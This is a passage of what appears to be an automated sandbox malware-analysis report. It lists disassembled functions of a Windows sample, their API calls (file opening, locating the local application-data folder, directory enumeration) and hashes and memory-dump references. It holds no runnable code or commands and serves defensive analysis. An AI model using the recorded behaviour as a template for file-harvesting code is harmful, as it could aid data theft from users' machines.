                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 53979a31ddea08e0fd73d351e7257f78a5a28560ea868b520cf8f85a0167e645
                          • Instruction ID: 103479cdd2d0f1b974682163c2c4774afa2172d98c89510ffa9cec62f5344ad7
                          • Opcode Fuzzy Hash: 53979a31ddea08e0fd73d351e7257f78a5a28560ea868b520cf8f85a0167e645
                          • Instruction Fuzzy Hash: 2C312A71A003189FDB14DBD0DD49BEDB778EB48301F104559F506AB188DB74AA89CB51
                          Function 009292E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00923AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00923AEE,?), ref: 009292FC
                          • GetFileSizeEx.KERNEL32(000000FF,00923AEE), ref: 00929319
                          • CloseHandle.KERNEL32(000000FF), ref: 00929327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                          • Instruction ID: a5fcdf055f9a6325d074450794e9116230467aa246f1962276b417f33552e284
                          • Opcode Fuzzy Hash: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                          • Instruction Fuzzy Hash: C5F04F35E40308BBDF10DFB0EC59F9E77B9AB4C711F10C694B651A72C4DA749A018B40
                          Function 0092C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0092C74E
                            • Part of subcall function 0092BF9F: __amsg_exit.LIBCMT ref: 0092BFAF
                          • __getptd.LIBCMT ref: 0092C765
                          • __amsg_exit.LIBCMT ref: 0092C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0092C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                          • Instruction ID: 2b0960ba740b7bb46acd8b438f084508203093b3282552c26cb6b4703663d6ac
                          • Opcode Fuzzy Hash: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                          • Instruction Fuzzy Hash: 60F0BEB39047309BD721BBB8BC07B9E33E46F80720F214249F505F62DBCB685940AE96
                          Function 00924F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924F7A
                          • lstrcat.KERNEL32(?,00931070), ref: 00924F97
                          • lstrcat.KERNEL32(?,01049DF8), ref: 00924FAB
                          • lstrcat.KERNEL32(?,00931074), ref: 00924FBD
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                            • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                            • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                            • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                          • Instruction ID: 47bc4c929d7c70b7fea9276d87625971ea1f8dded042f19f2dce2d863aae4f97
                          • Opcode Fuzzy Hash: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                          • Instruction Fuzzy Hash: 2A21887A90031867C754F760FC46FEE333DABD4701F004694B659A3185EE75A6C88F92